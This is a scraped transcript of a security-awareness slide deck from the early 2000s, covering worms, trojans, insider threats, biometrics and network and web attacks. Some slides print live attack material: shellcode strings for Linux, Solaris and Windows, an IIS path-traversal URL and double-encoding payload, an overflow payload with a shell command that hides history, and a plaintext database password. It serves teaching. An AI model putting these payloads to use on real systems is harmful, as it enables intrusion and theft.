#> rlogin -l root tgtsunprod2 last login: tue jul 3 14:52:41 from tgtsunprod1 sun microsystems...

57

Upload: elvin-bell

Post on 16-Jan-2016

214 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning
Page 2: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning
Page 3: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

#> rlogin -l root tgtsunprod2Last login: Tue Jul 3 14:52:41 from tgtsunprod1Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning Government Classified Server ***You have mail.tgtsunprod2 #/usr/sbin/ifconfig -aulo0: flags=1000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4> mtu 8232 index 1 inet 127.0.0.1 netmask ff000000qfe0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2 inet 172.16.22.7 netmask ffffff00 broadcast 172.16.21.255 ether 8:0:20:f7:d0:78dhsunprod2 #uname -aSunOS tgtsunprod2 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-80tgtsunprod2 #id

final target compromised

________

___

uid=0(root) gid=1(other)

$ _

Page 4: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Who am I?

Page 5: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

The Threat is Active• The blackhat community is

extremely active. – 20+ unique scans a day.– 100% - 900% increase of activity from

2000 to 2001– Its only getting worse

Don't Underestimate Cyberterrorists

Information Security is Information Security is Important …Important …

Page 6: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

…because we have so many friends

Page 7: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

…because we have so many friends

Page 8: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

…because we have so many friends

Page 9: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

…because we have so many friends

Page 10: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

…because we have so many friends

Page 11: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

The Attack

...........N..zCyhy...i..B...y...c....t...D.1..9P`.8../9...-.....

.........hjE.H.o.,B...."Oo...:.....'...i..%._~-...Z...RqAJX...p3.....p5o.j.../4/.H,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA........AAAA....AAAAAAAAAAAA..G@AAAA............AAAAAAAA....................................1....w..w..O.O.....1.....Q1..f......Y1.9.u.f..Xf9F.t.....1...1..?I..A..1...Q[....1.Ph//shh/bin..PS.......

[..]

68.168.1.15:52312 -> 127.0.0.1:443export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null; export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i.

68.168.1.15:52312 -> 127.0.0.1:443

Page 12: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Doom on You….

<SCRIPT LANGUAGE="VBScript" RUNAT="Server">Sub Application_OnStart   Set Db = Server.CreateObject("Commerce.DbServer")   Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c"   Db.Application = "http://10.1.1.16/"   Set Application("Db")   = DbEnd SubSub Session_OnStart   '==Visual InterDev Generated - DataConnection startspan==   '--Project Data Connection   Session("DataConn_ConnectionString") =   "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25;   FIL=MS Access;MaxBufferSize=512;PageTimeout=5;"   Session("DataConn_ConnectionTimeout") = 15   Session("DataConn_CommandTimeout") = 30   Session("DataConn_RuntimeUserName") = ""   Session("DataConn_RuntimePassword") = ""   '==Visual InterDev Generated - DataConnection endspan==End Sub</SCRIPT>

User ID: sa

Password: n0t4u2c

Page 13: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Trojan Horse Sept 26, 2001

• Crackers posted a Trojan Horse masquerading as a wu-ftpd exploit on the Vuln-Dev mailing list.

• If the code is compiled and run, it will delete most files on the host’s hard drive

Page 14: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

XSS Filter-Bypass Manipulation•This technique is used

pass various types of client-side scripting language through implemented security filters.

•The idea is to be able to achieve client-side execution of a client-side script.

•There are several techniques used to perform this attack.

Page 15: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

E-mail Virus Oct 2001

• BP Openworld’s billing department has been sending out the BadTrans virus with its responses to recent e-mail inquiries– The virus launches a Trojan horse in

infected machines– BP Openworld is a subsidiary of British

Telecommunications offering internet services for business and home use

Page 16: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Format String Vulnerabilities

Any call that passes user-supplied input directly to aAny call that passes user-supplied input directly to a*printf()*printf()-family function is dangerous. These calls can-family function is dangerous. These calls canAlso be identified by their argument deficiency.Also be identified by their argument deficiency.Consider this code:Consider this code:

printf(“%s“, userdata);printf(“%s“, userdata);

printf(userdata);printf(userdata); Argument deficiency

Page 17: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Fingerprint Recognition: Sensors (I)

Optical fingerprint sensor[Fingerprint Identification Unit

FIU-001/500 by Sony]

Electro-optical sensor [DELSY® CMOS sensor modul]

Capacitive sensor[FingerTIP™ by Infineon]

Page 18: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Physical Access Controls

• Network Segregation• Perimeter Security• Security Guards• Badge Systems• Biometric Access Controls• Closed Circuit TV Monitoring• Sensors & Alarms

Page 19: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

World Trade Center Virus

• The destructive TROJ_VOTE.A e-mail virus exploits the WTC tragedy– It attacks the infected users address

book to spread and send a message about peace between America and Islam

– It also installs two VBS files which attempt to delete the windows directory on reboot

Page 20: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

The Threat from the Insider

Page 21: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

NIMDA Worm

• The NIMDA worm raced around the world in only 30 minutes when it is was first released in Sept 2001

• Some AV experts recommended disconnecting from the Internet until patches and upgrades could be put into effect.

Page 22: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Iris Recognition

System for passive iris recognition by Sensar

Page 23: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Wireless Attacks• Wireless hacking is an increasing

threat to wired networks– Attackers can penetrate, monitor, and manipulate

data on traditional wired networks by accessing the system through its wireless sub-network.

– The attacker can intercede between two wired hosts behind a firewall, between a wired host and a wireless host, or between two wireless clients

– Uses a “man-in-the-middle” Address Resolution Protocol (ARP) cache poisoning attack.

Page 24: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Attack the Architecture

Java Runtime

WebServer

htmlhandler

html

jsp

text/htmlheader

/bin/sh

includefile

shtml

text/htmlheader

ProcessSSI tags

#exec#include

script/execu--table

ProcessJSP tags

JavaCompiler

class

shtmlhandler

jsphandler

defaulthandler

cgihandler

text/htmlheader

cgish,perl,…

Page 25: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

SirCam Worm

• SirCam surfaced in mid-July 2001– Scoops up documents in an infected PC and

mails them to people in the user’s address book

– The most damaging aspect is its ability to enlist dormant viruses in the users’ files and mail them to others

– Result: viruses that might not have spread very far alone get wider distribution and older viruses will get new life

– By Aug 2001, SirCam had infected over 100,000 computers in the US

Page 26: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Viruses – File (Parasitic) Viruses• Simple File Viruses

– After transplanting itself in the executable, the executable often doesn’t work

• Stealth Component– Work very similar

to stealth system sector viruses

• Mask the file size of infected files when a directory listing is done on them

Page 27: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

CyberTerrorism – Oct 2001

• The Pakastani hacker group G-Force defaced a US government web site and threatened to turn over “some very high confidential US data” to Al Queada officials if the war on terrorism continues

• This comes days after a government warning of sophisticated and sustained cyberattacks launched by pro-Muslim hacker groups such as G-Force, Doktor Nuker, and the Pakistan Hackerz Club

Page 28: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Redesi Worm – Oct 2001

• An e-mail attachment purporting to be a Microsoft software security patch is actually a worm– It spreads through e-mail– On Nov 11 the worm will reform the c:

drive of infected machines

Page 29: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Discretionary Access Control List (DACL)

• The DACL controls who can access the object and how.

permissions for only one user or one group at a

time

the object's Access Control

Settings

Page 30: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Credit Card Stealing Trojan

• Reported on Oct 29,2001 - Septer– Preying on sympathies for terrorist attack

victims, a credit card stealing trojan horse masquerading as an appeal for donations from the American Red Cross is making the rounds via e-mail

– Users click on the executable attachment and a donation request form loads. If completed, credit card numbers and contact information are saved and uploaded to a Web site.

Page 31: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

NT Rootkit

• Rootkit console with Keyboard sniffing

Page 32: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Former Employee Attack

• Wendy Sholds allegedly broke into her former boss’s computer– She forwarded confidential e-mail to

other employees– She used the boss’s username and

password to view private information on the company web site

Page 33: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Security Models

• Security Models– Bell-LaPadula– Biba– Chinese Walls– Clark-Wilson

Page 34: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Hacker Alliance

• Three pro-Islamic hacker groups have joined forces to carry out attacks– Each group is carrying out digital

attacks under a common banner– They are anti-Israel, anti-US/UK, anti-

India

Page 35: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Round 1 Decoding:scripts/..%255c../winntbecomes:scripts/..%5c../winnt(%25 = “%” Character)

Round 2 Decoding:scripts/..%5c../winntbecomes:scripts/..\../winnt

Directory path traversal is now possible using path obfuscation through Double

Hex Encoding.

IIS Double Hex

Page 36: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

USA Today Site Hacked

• The “USA Today” website was defaced with six bogus stories

• The site was taken offline for three hours

Page 37: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Security Testing

• Software will never be placed or deployed into a trusted or predictable environment

• Security testing requires attacking the software in a way that exercises the trust relationships.

• The software should be tested in ways that are unexpected while observing for behaviors that are unknown.

Page 38: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Student Data Exposed

• The permission level to access web logs at Resicom, a telecommunications company that provides intra-campus phone services to colleges was set too low– It allowed people to search for student

names, social security numbers and addresses

Page 39: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Microsoft Misrepresented Security

• A Federal Trade Commission (FTC) investigation found that Microsoft misrepresented both the level of security provided and the amount of data collected by its Passport services– Microsoft agreed to refrain from making

false claims about the information it collects and will submit to an independent audit of its security program every two years.

Page 40: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Programming Satan’s Computer

Page 41: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Cell Phone Virus

• A worm-type virus called Timofonica, hit customers of Spain’s Movistar service– It sends text messages scrolling across the

screens of cellular phones– It is the first virus known to target cell

pones – We can now expect copycat viruses

targeting cell phone and other hand-held devices such as Palm Pilots and Pocket PC computers

Page 42: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Microsoft Breakin

• A hacker broke into BetaPlace.com, Microsoft's web site for betatesters– evidently someone's log-in credentials were leaked to the

Internet. – Microsoft shut down the site after it became aware of the

breach; it also reset user passwords. – The site contains unreleased versions of Windows, other

software and activation keys. – A spokesman said the intruder did not access source

code. The event has sparked a criminal investigation.

Page 43: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

The Method token indicates the method to be performed on the resource identified by the Request-URI.

HTTP 1.1 Methods

Page 44: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Buffer Overflows• Overwrite return address

– Examples of shell-code strings:

LINUX on Intel:char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";

SPARC Solaris:char shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";

Windows:char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45“ “\xFD\x6D\xC6\x45\xFE\x64\x57\xC6\x45\xF8\x03" "\x80\x6D\xF8\x50"   "\x8D\x45\xFC\x50\x90\xB8" "EXEC" "\xFF\xD0\x33\xC0\x50\x90” “\xB8" "EXIT" "\xFF\xD0\xC3";

Page 45: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Different Threat Scenarios

1. Regular biometric sensor using artificially generated biometric data

2. Replay attack of eavesdropped biometric data

3. Manipulation of stored biometric reference data

Page 46: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

SNMP Management

Page 47: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Normal CAM Behavior III

A A B BMAC BMAC B

MAC CMAC C

MAC AMAC APort Port

11

A A B B

B is on Port 2B is on Port 2

I see do I see do NotNot see traffic to B!see traffic to B!

MACMAC

AA

BB

CC

PortPort

11

22

33

Page 48: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Double Encapsulated 802.1q VLAN Hopping Attack

• Send double encapsulated 802.1Q frames• Switch performs only one level of decapsulation• Unidirectional traffic only• Works even if trunk ports are set to off

Strip off First, and Strip off First, and Send Back outSend Back out

Note: Only works if trunk Note: Only works if trunk has the same native VLAN has the same native VLAN

as the attackeras the attacker

Page 49: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Hacking Cisco

Cisco Bugtraq Vulnerabilities

• 1998 - 3• 1999 - 5• 2000 - 23• 2001 - 46• 2002 (est) - 94

Page 50: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Typical Web Application Set-Up

WebServer

DB

DB

Web app

WebClient Web app

Web app

Web app

HTTPrequest

(cleartext or SSL)

HTTP reply(HTML,

Javascript, VBscript,

etc)

Plugins:•Perl•C/C++•JSP, etc

Database connection:•ADO,•ODBC, etc.

SQL Database

•Apache•IIS•Netscape etc…

Firewall

Page 51: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Traditional Hacking

• Requires specialized coding skills such as writing shell-code for buffer-overflows, etc.

• In short, it is a complex activity with a limited practitioner base.

...winsock_found:

xor eax, eaxpush eaxinc eaxpush eaxinc eaxpush eaxcall socketcmp eax, -1jnz socket_ok

push sockerrlpush offset sockerrcall write_consolejmp quit2

socket_ok:mov sock, eaxmov sin.sin_family, 2mov esi, offset _port

...

Page 52: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

NT IIS Showcode ASP Vulnerability

• Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0

• Gives remote users access to view any file on the same volume as the web server that is readable by the web server.

http://www.someserver.com/msadc/Samples/SELECTOR/Showcode

asp?source=/msadc/Samples/../../../../../boot.ini

Page 53: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

The MDAC AttackClient Server

Internet Explorer

or VB.exe

RDS Data

Control

OBDC Provider

RDS Data

Space

Custom Business Objects

RDS

Data Factory

ASP

(ADO)

Jet Provider Jet

3.5

OBDC

Remote Data Service

URL

HTML

OLE

DB

IIS

Server

Page 54: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

Missile of Death

WebServer

DB

DB

Web app

Web app

Web app

Web app

Page 55: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

An Example: Brute Forcing Session ID’s in URLS AUTOMATED DEMO!

Page 56: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning

$8.8 Billion Mistake by Microsoft

• According to Computer Economics, the worldwide economic impact of the Love Bug Virus was estimated at $8.75 billion

• The fact that Microsoft Outlook was designed to execute programs that were mailed to it made the virus possible..

Page 57: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning